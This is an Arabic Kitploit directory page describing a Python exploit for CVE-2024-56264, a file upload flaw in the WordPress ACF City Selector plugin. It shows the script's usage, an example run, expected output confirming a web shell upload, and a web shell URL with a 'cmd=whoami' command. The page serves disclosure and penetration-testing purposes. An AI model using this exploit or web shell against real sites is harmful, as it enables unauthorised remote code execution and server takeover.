Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-56264 — إضافة WordPress ACF City Selector <= 1.14.0 - ثغرة رفع ملفات عشوائية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-56264
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-56264

CVE-2024-56264

إضافة WordPress ACF City Selector <= 1.14.0 - ثغرة رفع ملفات عشوائية

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-56264

WordPress ACF City Selector - استغلال رفع الملفات التعسفي (CVE-2024-56264)

نظرة عامة

يحتوي هذا المستودع على استغلال لـ CVE-2024-56264، وهي ثغرة رفع ملفات تعسفي موجودة في إضافة ACF City Selector لووردبريس (الإصدارات <= 1.14.0). تتيح هذه الثغرة للمهاجم رفع ملف PHP خبيث (ويب شيل) إلى تثبيت ووردبريس هش وتنفيذ أوامر تعسفية على الخادم.

تفاصيل CVE

  • معرف CVE: CVE-2024-56264
  • تاريخ النشر: 2 يناير 2025
  • الإضافة المتأثرة: ACF City Selector
  • الإصدارات المتأثرة: <= 1.14.0
  • التأثير: تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر رفع الملفات دون قيود

الوصف

إضافة ACF City Selector لا تتحقق بشكل صحيح من الملفات المرفوعة، مما يسمح للمهاجمين بـتجاوز القيود ورفع ملفات PHP تعسفية. بمجرد رفع ملف PHP خبيث، يمكن للمهاجم تنفيذ أوامر النظام عن بُعد، مما يؤدي إلى اختراق الخادم بالكامل.

المتطلبات

📌 التبعيات

تأكد من تثبيت ما يلي قبل تشغيل السكربت:

  • Python 3.x
  • وحدة requests (قم بالتثبيت باستخدام: pip install requests)

يمكنك تثبيت جميع التبعيات المطلوبة باستخدام:

root@kitploit:~
pip install -r requirements.txt

🚀 الاستخدام

تشغيل الاستغلال:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

مثال:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

المخرجات المتوقعة

عند نجاح الاستغلال، يجب أن ترى:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

ما بعد الاستغلال

في حال النجاح، يمكنك الوصول إلى الشيل المرفوع عبر:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

يتيح ذلك تنفيذ الأوامر عن بُعد على الخادم.

⚠ إخلاء مسؤولية

هذا السكربت مخصص فقط للأغراض التعليمية واختبار الاختراق المصرح به. الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى عواقب وخيمة. المؤلف غير مسؤول عن أي إساءة استخدام لهذا الاستغلال.

تنزيل الأداة